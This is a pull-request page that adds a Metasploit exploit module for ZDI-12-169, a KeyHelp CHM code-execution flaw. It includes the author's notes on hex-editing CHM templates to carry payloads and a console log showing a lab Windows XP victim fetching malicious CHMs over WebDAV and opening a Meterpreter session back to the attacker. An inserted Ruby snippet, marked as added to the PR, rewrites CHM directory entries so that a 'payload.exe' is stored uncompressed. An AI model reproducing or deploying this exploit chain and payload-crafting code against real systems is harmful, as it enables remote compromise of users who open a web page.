
Added module for ZDI-12-169 #887

Merged
merged 4 commits into from Oct 10, 2012

Conversation

jvazquez-r7
Contributor

  • The CHM templates are generated from scratch. Used HTML Help Workshop, and then a hex editor to modify the listing chunks to allow embedding of arbitrary contents. Basically, disallow compression for the chunk containing the user-controlled contents.
  • The CHM templates land exe and mof files with fixed names... seems like hh is doing some additional check; open-source chmlib allows modifying the file name just by changing the listing chunks.
  • It's not using JS obfuscation because of the setTimeout.
  • Tested successfully on Windows XP SP3:

msf  exploit(keyhelp_launchtripane_exec) > [*] Using URL: http://0.0.0.0:80/
[*]  Local IP: http://192.168.1.128:80/
[*] Server started.
[*] 192.168.1.147    keyhelp_launchtripane_exec - Request for "/" does not contain a sub-directory, redirecting to /yzYGN8iAh/ ...
[*] 192.168.1.147    keyhelp_launchtripane_exec - Responding to GET request /yzYGN8iAh/
[*] 192.168.1.147    keyhelp_launchtripane_exec - Using \\\\192.168.1.128\\yzYGN8iAh\\wUmNsBV.chm for payload...
[*] 192.168.1.147    keyhelp_launchtripane_exec - Using \\\\192.168.1.128\\yzYGN8iAh\\OZHfruA.chm for the mof file...
[*] 192.168.1.147    keyhelp_launchtripane_exec - Sending HTML page
[*] 192.168.1.147    keyhelp_launchtripane_exec - Request for "/" does not contain a sub-directory, redirecting to /tauGn6IczbIrU/ ...
[*] 192.168.1.147    keyhelp_launchtripane_exec - Responding to WebDAV OPTIONS request
[*] 192.168.1.147    keyhelp_launchtripane_exec - Request for "/yzYGN8iAh" does not contain a sub-directory, redirecting to /yzYGN8iAh/ ...
[*] 192.168.1.147    keyhelp_launchtripane_exec - Received WebDAV PROPFIND request
[*] 192.168.1.147    keyhelp_launchtripane_exec - Sending directory multistatus for /yzYGN8iAh/ ...
[*] 192.168.1.147    keyhelp_launchtripane_exec - Received WebDAV PROPFIND request
[*] 192.168.1.147    keyhelp_launchtripane_exec - Sending CHM multistatus for /yzYGN8iAh/wUmNsBV.chm ...
[*] 192.168.1.147    keyhelp_launchtripane_exec - Responding to GET request /yzYGN8iAh/wUmNsBV.chm
[*] 192.168.1.147    keyhelp_launchtripane_exec - Sending CHM with payload
[*] 192.168.1.147    keyhelp_launchtripane_exec - Received WebDAV PROPFIND request
[*] 192.168.1.147    keyhelp_launchtripane_exec - Sending CHM multistatus for /yzYGN8iAh/OZHfruA.chm ...
[*] 192.168.1.147    keyhelp_launchtripane_exec - Responding to GET request /yzYGN8iAh/OZHfruA.chm
[*] 192.168.1.147    keyhelp_launchtripane_exec - Sending CHM with mof
[*] Sending stage (752128 bytes) to 192.168.1.147
[*] Meterpreter session 1 opened (192.168.1.128:4444 -> 192.168.1.147:2594) at 2012-10-10 19:13:36 +0200

msf  exploit(keyhelp_launchtripane_exec) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.147 - Meterpreter session 1 closed.  Reason: User exit
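
The listing-chunk edit described in the PR (pointing the directory entry for the user-controlled file at the uncompressed content section instead of the LZX-compressed one) as an added example; this is not the module's own code nor part of the original PR. It builds a single CHM directory listing chunk (PMGL) from constructed entries, parses it back, and rewrites one entry to section 0 the way the hex edit does. The entry names, offsets and lengths are made up; the section numbering (0 = Uncompressed, 1 = MSCompressed) is the conventional CHM layout, and in a real file the new offset must point at where the content bytes were actually placed in the uncompressed area, which this snippet does not write.

```ruby
# Added example (not from the Metasploit module): build, parse and edit a CHM
# directory listing chunk (PMGL). Entry names, offsets and lengths are
# constructed for illustration.

CHUNK_SIZE  = 4096          # CHM directory chunks are 4096 bytes
PMGL_HEADER = 0x14          # "PMGL" + free-space DWORD + reserved + prev + next
SECTIONS    = { 0 => 'Uncompressed', 1 => 'MSCompressed (LZX)' }  # conventional numbering

# ENCINT: big-endian groups of 7 bits, high bit set on every byte but the last.
def encint(n)
  bytes = [n & 0x7f]
  n >>= 7
  while n > 0
    bytes.unshift((n & 0x7f) | 0x80)
    n >>= 7
  end
  bytes.pack('C*')
end

# Decode an ENCINT at pos; returns [value, position after it].
def read_encint(buf, pos)
  val = 0
  loop do
    b = buf.getbyte(pos) or raise 'ENCINT runs past end of chunk'
    pos += 1
    val = (val << 7) | (b & 0x7f)
    break if (b & 0x80).zero?
  end
  [val, pos]
end

# Serialise entries into one PMGL chunk. Entries must stay in the directory's
# sorted order; free space is recomputed and the trailing WORD holds the count.
def build_pmgl(entries, prev_chunk: 0xFFFFFFFF, next_chunk: 0xFFFFFFFF)
  body = entries.map do |e|
    encint(e[:name].bytesize) + e[:name].b +
      encint(e[:section]) + encint(e[:offset]) + encint(e[:length])
  end.join.b
  free = CHUNK_SIZE - PMGL_HEADER - body.bytesize
  raise 'entries no longer fit in one 4096-byte chunk' if free < 2
  'PMGL'.b + [free, 0, prev_chunk, next_chunk].pack('V4') + body +
    ("\x00" * (free - 2)).b + [entries.size].pack('v')
end

# Walk the entries of a PMGL chunk and cross-check against the trailer count.
def parse_pmgl(chunk)
  raise 'not a PMGL chunk' unless chunk.byteslice(0, 4) == 'PMGL'.b
  free  = chunk.byteslice(4, 4).unpack1('V')
  count = chunk.byteslice(CHUNK_SIZE - 2, 2).unpack1('v')
  stop  = CHUNK_SIZE - free
  pos   = PMGL_HEADER
  entries = []
  while pos < stop
    nlen, pos = read_encint(chunk, pos)
    name = chunk.byteslice(pos, nlen)
    pos += nlen
    section, pos = read_encint(chunk, pos)
    offset, pos  = read_encint(chunk, pos)
    length, pos  = read_encint(chunk, pos)
    entries << { name: name, section: section, offset: offset, length: length }
  end
  raise "entry count #{entries.size} != trailer #{count}" unless entries.size == count
  entries
end

# The hex edit from the PR, done programmatically: point one entry at the
# uncompressed section so its bytes can later be overwritten in place.
def move_to_uncompressed(chunk, target, new_offset, new_length)
  entries = parse_pmgl(chunk)
  entry = entries.find { |e| e[:name] == target } or raise "#{target} not listed"
  entry.merge!(section: 0, offset: new_offset, length: new_length)
  build_pmgl(entries)
end

# Constructed sample directory: a system file plus two content files in the LZX section.
SAMPLE_ENTRIES = [
  { name: '/#SYSTEM',     section: 0, offset: 0,     length: 0x200 },
  { name: '/index.htm',   section: 1, offset: 0,     length: 0x4d1 },
  { name: '/payload.exe', section: 1, offset: 0x4d1, length: 0x1a00 },
].freeze

if __FILE__ == $0
  chunk = build_pmgl(SAMPLE_ENTRIES)
  parse_pmgl(chunk).each do |e|
    puts format('%-14s section=%d (%s) offset=0x%x length=0x%x',
                e[:name], e[:section], SECTIONS.fetch(e[:section], '?'), e[:offset], e[:length])
  end
  # Assumed: the payload bytes were written into the uncompressed content area
  # at offset 0x800; the listing is fixed up to match.
  patched = move_to_uncompressed(chunk, '/payload.exe', 0x800, 0x1a00)
  p parse_pmgl(patched).find { |e| e[:name] == '/payload.exe' }
end
```

Running `parse_pmgl` over a template before and after the edit is the quickest way to confirm which section each file lives in; a larger offset can make an ENCINT a byte longer, so the rebuild recomputes the free-space DWORD and refuses to emit a chunk that no longer fits in 4096 bytes.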

@wchen-r7 wchen-r7 merged commit f32ce87 into rapid7:master Oct 10, 2012